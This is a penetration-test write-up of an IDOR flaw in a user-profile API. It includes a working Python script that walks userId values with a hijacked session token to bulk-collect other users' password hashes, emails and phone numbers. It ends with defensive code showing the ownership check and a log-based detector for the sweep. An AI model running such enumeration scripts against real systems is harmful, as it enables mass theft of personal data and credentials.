During a penetration test of a website, after logging in, click "Edit Information".
Check the request data. Among the requests, one echoes account information keyed on the userId value, and the response carries sensitive data such as the account number, the password hash, the email address, and the mobile phone number.
Changing the userId value to 1 successfully echoes another user's account information.
This shows that the system has an API traversal problem (an insecure direct object reference: the endpoint never checks that the requested userId belongs to the logged-in user). A Python script was written to traverse userId values and obtain personal information in batches.
The script is as follows:
import requests
from colorama import init, Fore

init(autoreset=True)

# Headers copied from the logged-in session; the Cookie and Token values are the
# session credentials of the test account ('xxx' is the redacted cookie value).
header = {
    'Cookie': 'xxx',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0',
    'Accept': 'application/json, text/plain, */*',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Token': '625390f4-1103-4923-84b6-92ef86e7141c',
    'Referer': 'https://xx/userCenter/manCore/manMassage',
    'Sec-Fetch-Dest': 'empty',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Site': 'same-origin',
    'Te': 'trailers',
    'Connection': 'close',
}

# Walk userId values 1..99; every request is sent with the same session, which is
# exactly what the endpoint should reject but does not.
for i in range(1, 100):
    url = "https://xx/api/personal/detail?userId=%s" % i
    try:
        res = requests.get(url=url, headers=header)
        text = res.json()
        # Field names follow the JSON returned by the endpoint ("emil" is the API's own key).
        company = text.get("data").get("company")
        ip = text.get("data").get("createIP")
        name = text.get("data").get("userName")
        password = text.get("data").get("password")
        emil = text.get("data").get("emil")
        phone = text.get("data").get("phone")
        print(Fore.GREEN + "company:%s, 注册ip:%s, 账号:%s, 密码:%s, 邮箱:%s, 手机号:%s" % (company, ip, name, password, emil, phone))
    except:
        # A non-JSON response or a missing "data" object is silently skipped.
        pass
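For the server side of this finding, here is an added example (not code from the original write-up or from the tested system) that models the vulnerable handler beside a hardened one, and a small access-log check for the sweep pattern. The user records, the token names and the log line format are constructed assumptions; the field names mirror the JSON the page describes.

```python
import re
from collections import defaultdict

# Constructed records whose fields mirror the response described above (hypothetical values).
USERS = {
    1: {"userName": "alice", "company": "ExampleCo", "emil": "alice@example.com",
        "phone": "13800000001", "password": "<bcrypt hash>", "createIP": "203.0.113.5"},
    2: {"userName": "bob", "company": "ExampleCo", "emil": "bob@example.com",
        "phone": "13800000002", "password": "<bcrypt hash>", "createIP": "203.0.113.6"},
}

class Forbidden(Exception):
    """Raised where a real handler would answer HTTP 403."""

def detail_vulnerable(session_user_id, requested_user_id):
    """The bug on the page: the handler trusts the caller-supplied userId and
    returns the whole stored record, password hash included."""
    return {"data": USERS.get(requested_user_id)}

# Only what the profile page needs; password hash and registration IP never leave the server.
PROFILE_FIELDS = ("userName", "company", "emil", "phone")

def detail_hardened(session_user_id, requested_user_id):
    """Object-level authorization: the record is selected by the authenticated session,
    and a mismatching userId is rejected (a 403 that also shows up in access logs)."""
    if requested_user_id != session_user_id:
        raise Forbidden("userId does not belong to the authenticated user")
    record = USERS[session_user_id]
    return {"data": {k: record[k] for k in PROFILE_FIELDS}}

# Detection side: one token requesting many distinct userId values is the sweep pattern.
LOG_RE = re.compile(r"token=(?P<tok>\S+)\s.*\buserId=(?P<uid>\d+)")

def enumeration_suspects(log_lines, threshold=5):
    """Return tokens that fetched more than `threshold` distinct userId values."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.search(line)
        if m:
            seen[m["tok"]].add(int(m["uid"]))
    return sorted(tok for tok, ids in seen.items() if len(ids) > threshold)

if __name__ == "__main__":
    # Constructed access-log lines: tokA sweeps userId 1..20, tokB reads only its own record.
    lines = [f"token=tokA GET /api/personal/detail?userId={i} 200" for i in range(1, 21)]
    lines.append("token=tokB GET /api/personal/detail?userId=2 200")
    print(detail_vulnerable(2, 1))          # bob's session receives alice's full record
    print(detail_hardened(2, 2))            # bob sees only his own profile fields
    print(enumeration_suspects(lines))      # ['tokA']
```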